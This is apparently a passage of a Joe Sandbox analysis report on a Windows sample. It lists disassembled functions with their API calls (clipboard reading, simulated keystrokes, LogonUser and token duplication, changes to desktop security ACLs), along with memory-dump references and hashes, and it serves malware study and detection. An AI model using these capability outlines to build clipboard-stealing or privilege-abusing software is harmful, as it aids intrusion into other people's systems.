                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                  • Instruction ID: c10d6cb0fbd48422f437f72fbd9b3a76b9b66c724c4067a76db18fdd5f101ad4
                                  • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                  • Instruction Fuzzy Hash: E9E0D8B02097005FCF395A28A851BB777D49F09300F00045EF59FC2212E5722C41871D
                                  Function 00352B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00353837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00353908
                                    • Part of subcall function 0035D730: GetInputState.USER32 ref: 0035D807
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00352B6B
                                    • Part of subcall function 003530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0035314E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                  • String ID:
                                  • API String ID: 3667716007-0
                                  • Opcode ID: 8aed9d091555dbdde4d3618f8399395052cc78ebb6213393bb6d96e0df43e7b2
                                  • Instruction ID: 53899a5045c06f6eb226435b4f4bd04bf5fedbaeaaa90472f7f2eca910f48602
                                  • Opcode Fuzzy Hash: 8aed9d091555dbdde4d3618f8399395052cc78ebb6213393bb6d96e0df43e7b2
                                  • Instruction Fuzzy Hash: 0AE0862270428406C61ABB74A852DADA7599BE5393F80153EF9468B1B3DF24454E8252
                                  Function 0039039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,00000000,?,00390704,?,?,00000000,?,00390704,00000000,0000000C), ref: 003903B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 3689dce48fe7166992b7f63947cff5603bd5ae212a1b1e3e01a8a992e94b585f
                                  • Instruction ID: e0dd728694d245afd2a02fb4a0e7509ebb2815873245285cb664f5949324e099
                                  • Opcode Fuzzy Hash: 3689dce48fe7166992b7f63947cff5603bd5ae212a1b1e3e01a8a992e94b585f
                                  • Instruction Fuzzy Hash: 44D06C3205014DFBDF128F84DD46EDA3FAAFB48714F014100BE1856060C732E822AB91
                                  Function 00351CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                  Download Yara Rule
                                  APIs
                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00351CBC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: InfoParametersSystem
                                  • String ID:
                                  • API String ID: 3098949447-0
                                  • Opcode ID: d8d89038314fbc8ab6ca04043ab2ba260a56492a0f311c2a93ce5bef6269ba8c
                                  • Instruction ID: e0cf88c5408121bf43b1a4d4a5e64027b7796a216956c110ce933f72142e243b
                                  • Opcode Fuzzy Hash: d8d89038314fbc8ab6ca04043ab2ba260a56492a0f311c2a93ce5bef6269ba8c
                                  • Instruction Fuzzy Hash: A8C09B35380344BFF2358780BD4AF147755A35CB00F448011F609695F3C3E11451D658
                                  Function 011422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000001F4), ref: 011422B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                  • Instruction ID: 61e861616900771a56fdd295d4a0040c7532798800917251aea07722f2a68056
                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                  • Instruction Fuzzy Hash: 12E0BF7494010E9FDB00EFA4D54969E7BB4EF04701F100161FD0192281D73099508A62

                                  Non-executed Functions

                                  Function 003E9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00369BB2
                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003E961A
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003E965B
                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 003E969F
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003E96C9
                                  • SendMessageW.USER32 ref: 003E96F2
                                  • GetKeyState.USER32(00000011), ref: 003E978B
                                  • GetKeyState.USER32(00000009), ref: 003E9798
                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003E97AE
                                  • GetKeyState.USER32(00000010), ref: 003E97B8
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003E97E9
                                  • SendMessageW.USER32 ref: 003E9810
                                  • SendMessageW.USER32(?,00001030,?,003E7E95), ref: 003E9918
                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003E992E
                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003E9941
                                  • SetCapture.USER32(?), ref: 003E994A
                                  • ClientToScreen.USER32(?,?), ref: 003E99AF
                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003E99BC
                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003E99D6
                                  • ReleaseCapture.USER32 ref: 003E99E1
                                  • GetCursorPos.USER32(?), ref: 003E9A19
                                  • ScreenToClient.USER32(?,?), ref: 003E9A26
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 003E9A80
                                  • SendMessageW.USER32 ref: 003E9AAE
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 003E9AEB
                                  • SendMessageW.USER32 ref: 003E9B1A
                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003E9B3B
                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003E9B4A
                                  • GetCursorPos.USER32(?), ref: 003E9B68
                                  • ScreenToClient.USER32(?,?), ref: 003E9B75
                                  • GetParent.USER32(?), ref: 003E9B93
                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 003E9BFA
                                  • SendMessageW.USER32 ref: 003E9C2B
                                  • ClientToScreen.USER32(?,?), ref: 003E9C84
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003E9CB4
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 003E9CDE
                                  • SendMessageW.USER32 ref: 003E9D01
                                  • ClientToScreen.USER32(?,?), ref: 003E9D4E
                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003E9D82
                                    • Part of subcall function 00369944: GetWindowLongW.USER32(?,000000EB), ref: 00369952
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003E9E05
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                  • String ID: @GUI_DRAGID$F$p#B
                                  • API String ID: 3429851547-1943774513
                                  • Opcode ID: a7627ebc9813c2bc6dff819042705b53c1f40e7020fb6a7e8a9a87900f7205a6
                                  • Instruction ID: a560734da454d8a1d2fcc79cf82cd457f7a6dfb4d38cc94250b50b9ffedac5ce
                                  • Opcode Fuzzy Hash: a7627ebc9813c2bc6dff819042705b53c1f40e7020fb6a7e8a9a87900f7205a6
                                  • Instruction Fuzzy Hash: 48427D70204291AFD722CF26CC84BAABBF9FF49320F15461AF9998B2E1D7319C55CB51
                                  Function 003E4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003E48F3
                                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 003E4908
                                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 003E4927
                                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 003E494B
                                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 003E495C
                                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 003E497B
                                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003E49AE
                                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003E49D4
                                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 003E4A0F
                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003E4A56
                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003E4A7E
                                  • IsMenu.USER32(?), ref: 003E4A97
                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003E4AF2
                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003E4B20
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003E4B94
                                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 003E4BE3
                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 003E4C82
                                  • wsprintfW.USER32 ref: 003E4CAE
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003E4CC9
                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 003E4CF1
                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E4D13
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003E4D33
                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 003E4D5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                  • String ID: %d/%02d/%02d
                                  • API String ID: 4054740463-328681919
                                  • Opcode ID: f6c58cfdcf14f489972173dfb0ae602a6c1e41532eea28ed3f3ba866d4e3e838
                                  • Instruction ID: dffcc61429ce133e43fc4122c7ea0ccde6a428a3c356d000f67060836be9d15f
                                  • Opcode Fuzzy Hash: f6c58cfdcf14f489972173dfb0ae602a6c1e41532eea28ed3f3ba866d4e3e838
                                  • Instruction Fuzzy Hash: 1C1204319002A4ABEB268F26CC49FAF7BF8EF49710F144229F915EB2E1D7749941CB50
                                  Function 0036F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0036F998
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003AF474
                                  • IsIconic.USER32(00000000), ref: 003AF47D
                                  • ShowWindow.USER32(00000000,00000009), ref: 003AF48A
                                  • SetForegroundWindow.USER32(00000000), ref: 003AF494
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003AF4AA
                                  • GetCurrentThreadId.KERNEL32 ref: 003AF4B1
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003AF4BD
                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 003AF4CE
                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 003AF4D6
                                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 003AF4DE
                                  • SetForegroundWindow.USER32(00000000), ref: 003AF4E1
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003AF4F6
                                  • keybd_event.USER32(00000012,00000000), ref: 003AF501
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003AF50B
                                  • keybd_event.USER32(00000012,00000000), ref: 003AF510
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003AF519
                                  • keybd_event.USER32(00000012,00000000), ref: 003AF51E
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003AF528
                                  • keybd_event.USER32(00000012,00000000), ref: 003AF52D
                                  • SetForegroundWindow.USER32(00000000), ref: 003AF530
                                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 003AF557
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 4125248594-2988720461
                                  • Opcode ID: 54fc71c234b8cb1675981c49f266a2cc30300ee33c08b1763e8e0aa573668952
                                  • Instruction ID: 5ffd975839d5e2dcb81713aa614b2d27b941834db7319dbfe829cbc69a082641
                                  • Opcode Fuzzy Hash: 54fc71c234b8cb1675981c49f266a2cc30300ee33c08b1763e8e0aa573668952
                                  • Instruction Fuzzy Hash: 5531B271A50358BFEB326BF64C8AFBF7E6CEB45B50F111125FA00EA1D1C6B05D01AA60
                                  Function 003B1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003B170D
                                    • Part of subcall function 003B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003B173A
                                    • Part of subcall function 003B16C3: GetLastError.KERNEL32 ref: 003B174A
                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 003B1286
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003B12A8
                                  • CloseHandle.KERNEL32(?), ref: 003B12B9
                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003B12D1
                                  • GetProcessWindowStation.USER32 ref: 003B12EA
                                  • SetProcessWindowStation.USER32(00000000), ref: 003B12F4
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003B1310
                                    • Part of subcall function 003B10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003B11FC), ref: 003B10D4
                                    • Part of subcall function 003B10BF: CloseHandle.KERNEL32(?,?,003B11FC), ref: 003B10E9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                  • String ID: $default$winsta0$ZA
                                  • API String ID: 22674027-4061226650
                                  • Opcode ID: c0e0bbceed699dbe5df74fa665b85ae6e814b64c33689a03e4ca81d25e5fed60
                                  • Instruction ID: 8529e6b94a78db0324314cb878631275bdd54d78bdccc15d73b9685d5a6c921f
                                  • Opcode Fuzzy Hash: c0e0bbceed699dbe5df74fa665b85ae6e814b64c33689a03e4ca81d25e5fed60
                                  • Instruction Fuzzy Hash: 84819D71900249AFDF229FA5DC99FEF7BBDEF44708F144129FA10AA1A0DB758945CB20
                                  Function 003B0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B1114
                                    • Part of subcall function 003B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B1120
                                    • Part of subcall function 003B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B112F
                                    • Part of subcall function 003B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B1136
                                    • Part of subcall function 003B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B114D
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003B0BCC
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003B0C00
                                  • GetLengthSid.ADVAPI32(?), ref: 003B0C17
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 003B0C51
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003B0C6D
                                  • GetLengthSid.ADVAPI32(?), ref: 003B0C84
                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 003B0C8C
                                  • HeapAlloc.KERNEL32(00000000), ref: 003B0C93
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003B0CB4
                                  • CopySid.ADVAPI32(00000000), ref: 003B0CBB
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003B0CEA
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003B0D0C
                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003B0D1E
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B0D45
                                  • HeapFree.KERNEL32(00000000), ref: 003B0D4C
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B0D55
                                  • HeapFree.KERNEL32(00000000), ref: 003B0D5C
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B0D65
                                  • HeapFree.KERNEL32(00000000), ref: 003B0D6C
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003B0D78
                                  • HeapFree.KERNEL32(00000000), ref: 003B0D7F
                                    • Part of subcall function 003B1193: GetProcessHeap.KERNEL32(00000008,003B0BB1,?,00000000,?,003B0BB1,?), ref: 003B11A1
                                    • Part of subcall function 003B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,003B0BB1,?), ref: 003B11A8
                                    • Part of subcall function 003B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003B0BB1,?), ref: 003B11B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                  • String ID:
                                  • API String ID: 4175595110-0
                                  • Opcode ID: bfd47b76adae9669618895e869121e35da8cfe288b9b64e60e76a76abd79c823
                                  • Instruction ID: 1bca45855e71a717c6bfcf1e7eb1f723ea23bacd1c401e1be5dc08b22c66ce03
                                  • Opcode Fuzzy Hash: bfd47b76adae9669618895e869121e35da8cfe288b9b64e60e76a76abd79c823
                                  • Instruction Fuzzy Hash: 47715E7190020AABDF26DFA4DC84BEFBBBCBF05304F054619EA15AA191D771EE05CB60
                                  Function 003CEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenClipboard.USER32(003ECC08), ref: 003CEB29
                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 003CEB37
                                  • GetClipboardData.USER32(0000000D), ref: 003CEB43
                                  • CloseClipboard.USER32 ref: 003CEB4F
                                  • GlobalLock.KERNEL32(00000000), ref: 003CEB87
                                  • CloseClipboard.USER32 ref: 003CEB91
                                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 003CEBBC
                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 003CEBC9
                                  • GetClipboardData.USER32(00000001), ref: 003CEBD1
                                  • GlobalLock.KERNEL32(00000000), ref: 003CEBE2
                                  • GlobalUnlock.KERNEL32(00000000,?), ref: 003CEC22
                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 003CEC38
                                  • GetClipboardData.USER32(0000000F), ref: 003CEC44
                                  • GlobalLock.KERNEL32(00000000), ref: 003CEC55
                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003CEC77
                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003CEC94
                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003CECD2
                                  • GlobalUnlock.KERNEL32(00000000,?,?), ref: 003CECF3
                                  • CountClipboardFormats.USER32 ref: 003CED14
                                  • CloseClipboard.USER32 ref: 003CED59
                                  Memory Dump Source
